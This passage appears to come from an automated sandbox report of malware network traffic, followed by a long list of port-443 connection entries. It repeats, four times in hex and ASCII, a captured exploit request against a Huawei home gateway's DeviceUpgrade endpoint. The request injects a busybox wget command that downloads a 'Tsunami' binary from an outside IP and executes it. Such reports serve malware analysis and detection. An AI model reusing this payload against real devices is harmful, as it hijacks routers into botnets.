        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 33 36 2e 34 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.136.43.52 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 33 36 2e 34 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.136.43.52 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 33 36 2e 34 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.136.43.52 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 33 36 2e 34 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.136.43.52 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: unknownNetwork traffic detected: HTTP traffic on port 47716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52910
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46232
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52916
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45382
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44050
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47562
        Source: unknownNetwork traffic detected: HTTP traffic on port 60414 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 41734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 60094 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36432
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38612
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36434
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39942
        Source: unknownNetwork traffic detected: HTTP traffic on port 53684 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52232 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55198
        Source: unknownNetwork traffic detected: HTTP traffic on port 43194 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60530
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38604
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34252
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56040
        Source: unknownNetwork traffic detected: HTTP traffic on port 45490 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57372
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48408
        Source: unknownNetwork traffic detected: HTTP traffic on port 35962 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47558
        Source: unknownNetwork traffic detected: HTTP traffic on port 46460 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60534
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48402
        Source: unknownNetwork traffic detected: HTTP traffic on port 37742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43198
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52922
        Source: unknownNetwork traffic detected: HTTP traffic on port 33712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48880
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43194
        Source: unknownNetwork traffic detected: HTTP traffic on port 58168 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52862 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40918
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39930
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57388
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58236
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40910
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56058
        Source: unknownNetwork traffic detected: HTTP traffic on port 46058 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 53042 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 38048 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 60082 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 51008 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45366
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47542
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48872
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50758
        Source: unknownNetwork traffic detected: HTTP traffic on port 33048 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44030
        Source: unknownNetwork traffic detected: HTTP traffic on port 56606 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 45764 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37742
        Source: unknownNetwork traffic detected: HTTP traffic on port 38700 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33378
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60554
        Source: unknownNetwork traffic detected: HTTP traffic on port 40110 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40900
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60552
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58246
        Source: unknownNetwork traffic detected: HTTP traffic on port 42016 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35560
        Source: unknownNetwork traffic detected: HTTP traffic on port 52404 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56060
        Source: unknownNetwork traffic detected: HTTP traffic on port 59126 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 43502 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 44176 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43178
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46688
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44022
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45352
        Source: unknownNetwork traffic detected: HTTP traffic on port 36256 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45354
        Source: unknownNetwork traffic detected: HTTP traffic on port 57874 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 43080 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34218
        Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34698
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39910
        Source: unknownNetwork traffic detected: HTTP traffic on port 45912 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 42602 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59586
        Source: unknownNetwork traffic detected: HTTP traffic on port 40900 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60562
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59588
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37728
        Source: unknownNetwork traffic detected: HTTP traffic on port 53820 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58250
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47528
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48858
        Source: unknownNetwork traffic detected: HTTP traffic on port 39272 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 33654 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 55292 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48856
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 45348
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46278
        Source: unknownNetwork traffic detected: HTTP traffic on port 48952 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
        Source: unknownNetwork traffic detected: HTTP traffic on port 60164 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 48182 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 45204 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 47340 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38652
        Source: unknownNetwork traffic detected: HTTP traffic on port 59596 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 38908 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59504
        Source: unknownNetwork traffic detected: HTTP traffic on port 36518 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36468
        Source: unknownNetwork traffic detected: HTTP traffic on port 40052 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58662
        Source: unknownNetwork traffic detected: HTTP traffic on port 45224 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 33450 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57334
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40968
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34290
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60978
        Source: unknownNetwork traffic detected: HTTP traffic on port 46688 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 33768 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 36200 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 45236 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44088
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50702
        Source: unknownNetwork traffic detected: HTTP traffic on port 53754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
        Source: unknownNetwork traffic detected: HTTP traffic on port 56250 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 56504 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39970
        Source: unknownNetwork traffic detected: HTTP traffic on port 33106 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 51974 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52792 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37312
        Source: unknownNetwork traffic detected: HTTP traffic on port 55542 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59516
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38636
        Source: unknownNetwork traffic detected: HTTP traffic on port 37156 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39966
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40954
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59522
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56492
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40958
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35130
        Source: unknownNetwork traffic detected: HTTP traffic on port 52334 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60506
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40952
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60986
        Source: unknownNetwork traffic detected: HTTP traffic on port 36580 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50710
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46254
        Source: unknownNetwork traffic detected: HTTP traffic on port 60978 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 32934 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44074
        Source: unknownNetwork traffic detected: HTTP traffic on port 45854 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 40040 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 57256 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 45694 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 43276 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35118
        Source: unknownNetwork traffic detected: HTTP traffic on port 34890 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 37640 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 39616 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36456
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37778
        Source: unknownNetwork traffic detected: HTTP traffic on port 46026 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36448
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55178
        Source: unknownNetwork traffic detected: HTTP traffic on port 44528 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 42430 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34270
        Source: unknownNetwork traffic detected: HTTP traffic on port 35790 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 38596 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46246
        Source: unknownNetwork traffic detected: HTTP traffic on port 44050 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 33630 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52906
        Source: unknownNetwork traffic detected: HTTP traffic on port 52346 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58208
        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 51638 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 44188 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 37778 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59542
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56034
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39944
        Source: unknownNetwork traffic detected: HTTP traffic on port 40592 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 39452 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55184
        Source: unknownNetwork traffic detected: HTTP traffic on port 60300 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 43342 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 36096 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60526
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 44058
        Source: unknownNetwork traffic detected: HTTP traffic on port 35388 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 41926 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 59756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53846
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47168
        Source: unknownNetwork traffic detected: HTTP traffic on port 55804 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 34668 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38692
        Source: unknownNetwork traffic detected: HTTP traffic on port 50546 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36032
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39540
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38696
        Source: unknownNetwork traffic detected: HTTP traffic on port 56884 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 51568 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38698
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37368
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36038
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60136
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42706
        Source: unknownNetwork traffic detected: HTTP traffic on port 37132 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 36162 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 37046 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59154
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35186
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59156
        Source: unknownNetwork traffic detected: HTTP traffic on port 60234 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 44820 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50758 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 47158
        Source: unknownNetwork traffic detected: HTTP traffic on port 51082 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 57276 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 48484
